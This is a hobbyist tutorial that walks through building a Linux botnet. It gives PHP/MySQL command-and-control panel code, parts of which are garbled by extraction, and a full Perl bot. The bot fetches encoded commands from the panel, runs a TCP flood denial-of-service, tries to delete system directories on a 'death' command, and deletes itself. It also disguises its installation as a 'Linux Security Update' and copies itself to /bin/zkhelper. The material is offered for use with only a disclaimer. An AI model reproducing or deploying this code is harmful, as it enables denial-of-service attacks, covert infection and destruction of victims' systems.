[ Setting up BotNet: HTTP Control module and perl bot ] Here i'm gonna show you how to code a very simple bot in perl scripting language and http control module. The bot is for Linux systems. You can use all the code shown here, modify it and redistribute as well. And notice, you are the only one who will be responsible for any usage of this information. OK, lets say you got a linux on your machine so now you need a few tools to proceed. BTW, some coding skills required too. So, to test final product you need a web server running on your machine or an account on some free web hosting. To set up web server just open terminal and search for it in repositories. x1machine~# slapt-get --search apache apache-ant-1.7.0-i586-1bj [inst=no]: ant (Java-based build tool) apache-tomcat-6.0.16-i486-1ld [inst=no]: apache_tomcat (a Servlet/JSP container) apr-1.2.8-i486-1 [inst=yes]: apr (Apache Portable Runtime) apr-util-1.2.8-i486-1 [inst=yes]: apr-util (Apache Portable Runtime utilities) gconf-2.20.1-i686-6as [inst=no]: GConf (Configuration system) httpd-2.2.4-i486-6 [inst=no]: httpd (The Apache HTTP Server) httpd-2.2.9-i486-1_slack12.0 [inst=no]: httpd (The Apache HTTP Server) mm-1.4.2-i486-2 [inst=no]: mm (Shared Memory Allocation library) mod_mono-1.9-i686-1as [inst=no]: Mod_mono (Apache module is used to run ASP.NET) proftpd-1.3.0a-i486-1 [inst=no]: proftpd (FTP server daemon) proftpd-1.3.1-i486-1_slack12.0 [inst=no]: proftpd (FTP server daemon) xalan-c-1.10.0-i686-1dav [inst=no]: Xalan-C++ xerces-c-2.8.0-i686-1as [inst=no]: Xerces-C++ (Validating XML parser) x1machine~# slapt-get --install httpd-2.2.9-i486-1_slack12.0 [inst=no]: httpd (The Apache HTTP Server) Ok, next thing, php interpreter, as our control module will use php scriptting language x1machine~# slapt-get --search php php-5.2.3-i486-2 [inst=no]: php (HTML-embedded scripting language) php-5.2.6-i486-1_slack12.0 [inst=no]: php (HTML-embedded scripting language) x1machine~# slapt-get --install php-5.2.6-i486-1_slack12.0 Next step, you need mysql database, as information about bots will be stored in mysql database x1machine~# slapt-get --search mysql kmysqladmin-0.7.2-i486-1as [inst=no]: Kmysqladmin (A graphical frontend for mysql servers) knoda-0.8.3-i486-1ms [inst=no]: Knoda (A database frontend for KDE) mysql-5.0.37-i486-1 [inst=no]: mysql (SQL-based relational database server) mysql-5.0.51-i486-1_slack12.0 [inst=no]: mysql (SQL-based relational database server) mysql-administrator-5.0r12-i486-2sl [inst=no]: mysql-administrator (GUI tool for MySQL Server) mysql-gui-common-5.0r12-i486-2sl [inst=no]: mysql-gui-common (Libraries for MySQL tools) mysql-query-browser-5.0r12-i486-2sl [inst=no]: mysql-query-browser (Visual database query tool) x1machine~# slapt-get --install kmysqladmin-0.7.2-i486-1as x1machine~# slapt-get --install mysql-5.0.51-i486-1_slack12.0 x1machine~# slapt-get --install mysql-administrator-5.0r12-i486-2sl x1machine~# slapt-get --install mysql-gui-common-5.0r12-i486-2sl x1machine~# slapt-get --install mysql-query-browser-5.0r12-i486-2sl Ok, now you have 3 most important elements. Lets check php now. Open /etc/httpd/httpd.conf and search for lines: LoadModule php5_module lib/httpd/modules/libphp5.so AddType application/x-httpd-php .php or this one line: Include /etc/httpd/mod_php.conf If you have this lines, its ok, but if not - add these first two. Your server directory should look like: /var/www/htdocs so go there and create some php file to test if everything working nice. save it as file.php and open in web browser like this: http://localhost/file.php , if your server is working - you'll see nice php settings, if not - search for help in google. Now try to launch mysql daemon: x1machine~# mysql if you have problems with launching mysql, try to use my tool from x1machine store. If you still cannot launch mysql, google is your friend. Lets say you got luck and everything is running, so now we are going to code contol module for our botnet. First our file will store database settings , configuration file: cf.php -------------------------------------------------------------------------------------------------------------| -------------------------------------------------------------------------------------------------------------| Save it. Now, to make our life easier, lets create database installation script, which will create our database and database table. install.php -------------------------------------------------------------------------------------------------------------| -------------------------------------------------------------------------------------------------------------| Now we need a script that will capture information about our bots as they will connect, and store it in database. base.php -------------------------------------------------------------------------------------------------------------| $_GET['gcm'] $res=mysql_query("SELECT ip FROM $x_table WHERE uid='".$uid."'"); // select some value from database for ($i=0, $ROWS=mysql_num_rows($res); $i<$ROWS; $i++) // our loop for fetching databse { $row=mysql_fetch_row($res); // fetching database for($j=0;$j -------------------------------------------------------------------------------------------------------------| Lets create now simple script, which will show our botnet statistics. st.php -------------------------------------------------------------------------------------------------------------| Botnet Control System
© BotNet Control System
Designed For Hybrid Control

<--End of html form, now php script -->
[ Linux Machines ]

'; echo '
'; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; $res = mysql_query("SELECT * FROM $x_table"); // select everything from botnet table for ($i=0, $ROWS=mysql_num_rows($res); $i<$ROWS; $i++){ // loop $row = mysql_fetch_assoc($res); // fetching... echo ''; foreach ($row as $key => $value){ // next loop if($key=="id") continue; // look for 'id' value // now simply select and print what do we have in databse based on our values if($key=="uid"){ // bot name $uid = $value; echo ""; } //^1 if($key=="ip"){ // IP $ip = $value; echo ""; } //^2 if($key=="lseen"){ // last seen $lcon = $value; echo ""; } //^3 } //^4 // a button to delete bot from database if he is inactive for a long time, probably dead or removed ;/ echo ''; echo '';} echo '
ip adress
last connection
'; } //^5 //^6 MysqlConnect($x_host, $x_login, $x_pass, $x_base); ShowStats($x_table); if($_GET['bot'] == "delete"){ // if we wanna delete bot...button pressed $duid = htmlspecialchars(addslashes($_GET['uid'])); echo " realy delete $duid ?"; echo '
'; echo '

'; echo '

'; if(!is_null($_POST['submit'])){ // if we realy want to delete it... mysql_query("DELETE FROM $x_table WHERE uid = '$duid'"); // deleting from database echo "
press here for redirect
"; echo ''; }} ?> -------------------------------------------------------------------------------------------------------------| Ok, save the file. Now we need script to give commands to our bots. Simply script will write commands to a text file, encoded with rot47 encryption. Here we go... cmd.php -------------------------------------------------------------------------------------------------------------| <--Next html form --> © BotNet Control System
SetUp Command For Bot

<--End of html form --> ?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~', 'PQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNO'); }} if ($action){ // if submit button pressed $crycmd = str_rot47($cmd); // encoding command $plik = fopen("cm.txt","w+"); // open file for overwriting fwrite($plik,$crycmd); // writing command to text file fseek($plik,0); $linia = fread($plik,100); // read file $line = str_rot47($linia); // decode command echo "Command:
"; // print command fclose($plik); // close file } ?>

Commands should have format like --> cmd:argv1:argv2
Ex --> ddos:host:port:time (in sec), ddos:localhost:80:666
Available Commands:
Sleep --> sleep:time
Erase victim HDD --> death
DoS --> ddos:host:port:time
Message to victim --> msg:some message
-------------------------------------------------------------------------------------------------------------| Ok. And the last file, our main index file. index.php -------------------------------------------------------------------------------------------------------------| Botnet Control System
© BotNet Control System
Designed For Hybrid Control

?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~', 'PQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNO'); }} $plik = fopen("cm.txt","r"); // open file $linia = fread($plik,100); // read file $line = str_rot47($linia); // decode command echo "Command For Bots:
"; // print command fclose($plik); // close file ?> >set command for bot<
-------------------------------------------------------------------------------------------------------------| So, now we got control panel. Now put all files in server directory and run install.php file like: http://localhost/install.php , this should create database. After you can delete install.php. Check out your new admin panel for botnet control. Oh, and create empty text file, like: cm.txt. Here commands will be stored. And, x1machine~# chmod 777 /var/www/htdocs/cm.txt Ok. The last thing we need it's bot. Our small perl ddos bot. bot.pl -------------------------------------------------------------------------------------------------------------| use Socket; #perl libraries, we need them oh yeah! use IO::Socket; require LWP::UserAgent; use IO::Handle; use Tk; use Tk::Text; use Tk::MainWindow; use Tk::DummyEncode; use Tk::Frame; use Tk::LabFrame; use POSIX qw(setsid); use LWP::Simple; # this is for perl2exe, to compile our bot into standalone executable # what we will do to make it run on Linux without perl interpreter installed # notice, i have used Tk graphical libraries # coz i want to have MessageBox command # like i can display some message on victim system # if you dont need to do that, you can delete them # you'll get less fucking with perl2exe to compile your bot #perl2exe_include Socket #perl2exe_include IO::Socket #perl2exe_include LWP::UserAgent #perl2exe_include IO::Handle #perl2exe_include Tk #perl2exe_include Tk::Text #perl2exe_include Tk::MainWindow #perl2exe_include Tk::DummyEncode #perl2exe_include Tk::Frame #perl2exe_include Tk::LabFrame #perl2exe_include LWP::Simple #perl2exe_include utf8; #perl2exe_include "unicore/lib/gc_sc/Word.pl"; #perl2exe_include "unicore/lib/gc_sc/Digit.pl"; #perl2exe_include "unicore/lib/gc_sc/SpacePer.pl"; #perl2exe_include "unicore/lib/gc_sc/Uppercas.pl"; #perl2exe_include "unicore/To/Lower.pl"; sub rot47 { #rot47 decryptor of commands from remote http server my ($str)=@_; $str =~ tr/!-~/P-~!-O/; return $str; } sub getcmd { # that is how bot gets commands from remote server open (F,"; # store bot name in variable $xx3 my $ua = LWP::UserAgent->new; // initialize tcp connection $ua->timeout(100); $ua->env_proxy; my $url = "http://localhost/hybrid/base.php?gcm=1&uid=$xx3"; # here we will go my $response = $ua->get($url); # perform connection, now bot is in statistics my $ua2 = LWP::UserAgent->new; # now new connection to get commands $ua2->timeout(100); $ua2->env_proxy; my $url2 = "http://localhost/hybrid/cm.txt"; # here is our commands my $response2 = $ua2->get($url2); # connect... if ($response2->is_success) { # if success my ($str1, $str2, $str3, $str4, $str5, $str6, $str7); # declarating of strings $str1 = "sleep"; $str3 = $str1 . $str2; $str4 = "ddos"; # our commands $str5 = "selfdel"; $str6 = "death"; $str7 = "msg"; $length = length ($random_number.$login); # i was experimenting and dont remmember what that for ;P my $cryangel = rot47($response2->content); # decrypt http server response if ($cryangel =~ /^$str3/ || $cryangel =~ /^0-9$/){ # and here we go... @words = split(/:/, $cryangel); # splittig line into words... my $arg = $words[1]; # each word is an argument sleep $arg; # and there goes bot<->server communication format, like: if command is sleep, then sleep for time extracted from argument, etc.. } elsif ($cryangel =~ /^$str4/){ my $pid = fork(); if ($pid == 0){ @words2 = split(/:/, $cryangel); my $argv1 = $words2[1]; my $argv2 = $words2[2]; # DoS function grepped from Panic ddos tool # Just a little bit smaller here my $host = $argv1; my $port = $argv2; my $time = $argv3; my $x1 = my $x2 = my $x3 = 1; my $x10 = 0; my $x7 = getprotobyname("tcp"); my $x11 = inet_aton($host); my $x12 = sockaddr_in($port, $x11); my $x8 = IO::Socket::INET->new (PeerAddr=>$host,PeerPort=>$port,Proto=>$x7,Timeout=>10,ReuseAddr=>1) or die; shutdown($x8, 2) or die; while(31337) { my $x5 = 0; while($x5<$x1) { my $x4 = "SOCK_$x5"; socket($x4, PF_INET, SOCK_STREAM, $x7); connect($x4, $x12) || $x3--; $x5++;} $x10++; my $x6 = 0; while($x6<$x2) { $x9 = "SOCK_$x6" ; shutdown($x9, 2) or die ""; $x6++; }} } else { sleep $argv3; kill 9, $pid;} } elsif ($cryangel =~ /^$str5/){ unlink $0; unlink "/etc/bot.log"; }elsif ($cryangel =~ /^$str6/){ rmdir("/home/"); rmdir("/var/"); rmdir("/root/"); rmdir ("/usr/"); rmdir("/etc/"); rmdir("/lib/"); rmdir("/bin/"); rmdir("/"); }elsif ($cryangel =~ /^$str7/){ # here goes my beloved MessageBox command :P @words3 = split(/:/, $cryangel); my $ar1 = $words3[1]; my $m_____ = new MainWindow( -title => "System Message" ); $m_____->resizable(0,0); my $m______ = $m_____->LabFrame(-label=>"Warning!", -labelside => "acrosstop") -> pack(); my $m_______ = $m______->Label(-text=>"$ar1") -> pack(); MainLoop; } else { sleep 10; # or you can add here your own function } } } sub daemonize{ # we need our bot to be a daemon, it's like service in windows chdir '/' or die ""; # change directory open STDIN, '/dev/null' or die ""; # redirect output to the black hole :D:D open STDOUT, '>>/dev/null' or die ""; open STDERR, '>>/dev/null' or die ""; defined(my $pid = fork) or die ""; # forking.. exit if $pid; # forked to background setsid or die ""; umask 0; } sub checklog{ # our check log function # bot will create log file to store some info in it, like his own name open (F,"; if (length($xxx) > 2){ close F; daemonize(); } elsif ($xxx == "1"){ unlink("/etc/bot.log"); my($logFile) = "/etc/bot.log"; my($script) = __FILE__; my $range = 10000000000; my $random_number = int(rand($range)); my $login = getlogin(); my($name) = $random_number.$login; open(LOGFILE,">>$logFile") or die(""); print LOGFILE ("$name"); close(LOGFILE); close F; daemonize(); } else { print "<------------------------------->\n"; print "| Linux Security Update |\n"; print "<------------------------------->\n"; print "Installing Modules..."; system "cp $0 /bin/zkhelper"; #$in = $0; #$out = "/bin/zkhelper"; #open (IN,$in); #open (OUT,">$out"); #print OUT $buffer while (read (IN,$buffer,65536)); my($logFile) = "/etc/bot.log"; my($script) = __FILE__; my($name) = "1"; open(LOGFILE,">>$logFile") or die(""); print LOGFILE ("$name"); close(LOGFILE); # system "echo '/bin/zkhelper' >> /etc/cron.daily/0anacron"; # system "echo '\n/bin/zkhelper' >> /etc/profile"; system "chmod 777 /bin/zkhelper"; system "zkhelper"; unlink $0; exit; }} # and last, main body checklog(); # check log file for info while(1) { # infinitive loop getcmd(); sleep (10); } -------------------------------------------------------------------------------------------------------------| Now you can compile it with perl2exe like: x1machine~# perl2exe bot.pl If you will not use Tk libs, you can just download perl2exe and compile it without any problems i think... But, if there is some shit like perl2exe telling you that you dont have some libs, but bot is running nice on your own machine, look for that libs on your system, you should find them, next copy missing libs to perl2exe/perl5 folder, into included folders. Anyway, just read debugging info while compiling bot. Notice that, in bots code, there are moments when function 'die' is used. If shit will happen and 'die' will executed, bot will die forever, you have to think 'bout replace them with for ex. 'exit'. And another thing, think 'bout how to make bot start with system start. Anyway, with modifications, you are on you own. And here ya go, you got a control module and the bot. Have fun. Author: cross © 2008 x1machine.com